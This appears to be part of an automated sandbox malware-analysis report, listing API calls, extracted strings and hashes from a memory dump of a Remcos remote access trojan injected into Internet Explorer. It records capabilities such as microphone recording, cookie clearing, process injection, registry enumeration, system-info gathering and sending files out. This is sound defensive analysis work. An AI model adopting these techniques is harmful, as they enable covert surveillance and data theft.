              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
              • __fassign.LIBCMT ref: 0044B479
              • __fassign.LIBCMT ref: 0044B494
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
              • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID: @"a/
              • API String ID: 1324828854-2936340451
              • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
              • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
              • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
              • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
              APIs
              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
              • Sleep.KERNEL32(00000064), ref: 00417521
              • DeleteFileW.KERNEL32(00000000), ref: 00417555
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$CreateDeleteExecuteShellSleep
              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
              • API String ID: 1462127192-2001430897
              • Opcode ID: 24860bba1ca6d39e58684622ae37d334e07c70980af5cb68966be1760d504b52
              • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
              • Opcode Fuzzy Hash: 24860bba1ca6d39e58684622ae37d334e07c70980af5cb68966be1760d504b52
              • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
              APIs
              • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Program Files (x86)\Internet Explorer\iexplore.exe), ref: 0040749E
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CurrentProcess
              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
              • API String ID: 2050909247-4242073005
              • Opcode ID: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
              • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
              • Opcode Fuzzy Hash: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
              • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
              APIs
              • _strftime.LIBCMT ref: 00401D50
                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
              • API String ID: 3809562944-243156785
              • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
              • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
              • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
              • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
              • int.LIBCPMT ref: 00410E81
                • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
              • std::_Facet_Register.LIBCPMT ref: 00410EC1
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
              • __Init_thread_footer.LIBCMT ref: 00410F29
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
              • String ID: ,kG$0kG
              • API String ID: 3815856325-2015055088
              • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
              • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
              • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
              • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
              APIs
              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
              • waveInStart.WINMM ref: 00401CFE
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
              • String ID: dMG$|MG$PG
              • API String ID: 1356121797-532278878
              • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
              • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
              • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
              • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
              • TranslateMessage.USER32(?), ref: 0041D4E9
              • DispatchMessageA.USER32(?), ref: 0041D4F3
              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
              • String ID: Remcos
              • API String ID: 1970332568-165870891
              • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
              • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
              • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
              • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
              • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
              • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
              • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: __freea$__alloca_probe_16_free
              • String ID: @"a/$a/p$am/pm$zD
              • API String ID: 2936374016-668581093
              • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
              • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
              • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
              • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: tcp$udp
              • API String ID: 0-3725065008
              • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
              • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
              • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
              • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
              APIs
              • __Init_thread_footer.LIBCMT ref: 004018BE
              • ExitThread.KERNEL32 ref: 004018F6
              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
              • String ID: PkG$XMG$NG$NG
              • API String ID: 1649129571-3151166067
              • Opcode ID: 57644242a154eb5429782c5473eb60d46b2fcae27bdfa9afb519477d4fc83694
              • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
              • Opcode Fuzzy Hash: 57644242a154eb5429782c5473eb60d46b2fcae27bdfa9afb519477d4fc83694
              • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
              APIs
              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
              • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
              • String ID: .part
              • API String ID: 1303771098-3499674018
              • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
              • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
              • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
              • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
              APIs
              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
              • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: InputSend
              • String ID:
              • API String ID: 3431551938-0
              • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
              • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
              • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
              • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: @"a/
              • API String ID: 0-2936340451
              • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
              • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
              • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
              • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
              APIs
                • Part of subcall function 00446137: HeapAlloc.KERNEL32(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • _free.LIBCMT ref: 00444E06
              • _free.LIBCMT ref: 00444E1D
              • _free.LIBCMT ref: 00444E3C
              • _free.LIBCMT ref: 00444E57
              • _free.LIBCMT ref: 00444E6E
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$AllocHeap
              • String ID: @"a/
              • API String ID: 1835388192-2936340451
              • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
              • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
              • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
              • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
              APIs
              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Enum$InfoQueryValue
              • String ID: [regsplt]$xUG$TG
              • API String ID: 3554306468-1165877943
              • Opcode ID: c89703c452742340ff60579caf23f853db4314ddae31bb61f668ab7a5683df1c
              • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
              • Opcode Fuzzy Hash: c89703c452742340ff60579caf23f853db4314ddae31bb61f668ab7a5683df1c
              • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
              APIs
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
              • _free.LIBCMT ref: 004493BD
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00449589
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
              • String ID: @"a/
              • API String ID: 1286116820-2936340451
              • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
              • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
              • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
              • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID: D[E$D[E
              • API String ID: 269201875-3695742444
              • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
              • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
              • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
              • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
              APIs
              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseEnumInfoOpenQuerysend
              • String ID: xUG$NG$NG$TG
              • API String ID: 3114080316-2811732169
              • Opcode ID: 7903062090a5edee9dc75d83e84fcebabe47b6331e40db8456511ab981d8410c
              • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
              • Opcode Fuzzy Hash: 7903062090a5edee9dc75d83e84fcebabe47b6331e40db8456511ab981d8410c
              • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID: @"a/
              • API String ID: 269201875-2936340451
              • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
              • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
              • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
              • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
              • __alloca_probe_16.LIBCMT ref: 004511B1
              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
              • __freea.LIBCMT ref: 0045121D
                • Part of subcall function 00446137: HeapAlloc.KERNEL32(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
              • String ID: @"a/
              • API String ID: 1857427562-2936340451
              • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
              • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
              • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
              • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
              APIs
                • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
              • _wcslen.LIBCMT ref: 0041B763
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
              • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
              • API String ID: 37874593-122982132
              • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
              • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
              • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
              • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
              APIs
                • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
              • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
              • API String ID: 1133728706-4073444585
              • Opcode ID: 5b9d74b66cc472baafa10e41f39f337064218d641a61e11d3f09bb87c583bdee
              • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
              • Opcode Fuzzy Hash: 5b9d74b66cc472baafa10e41f39f337064218d641a61e11d3f09bb87c583bdee
              • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
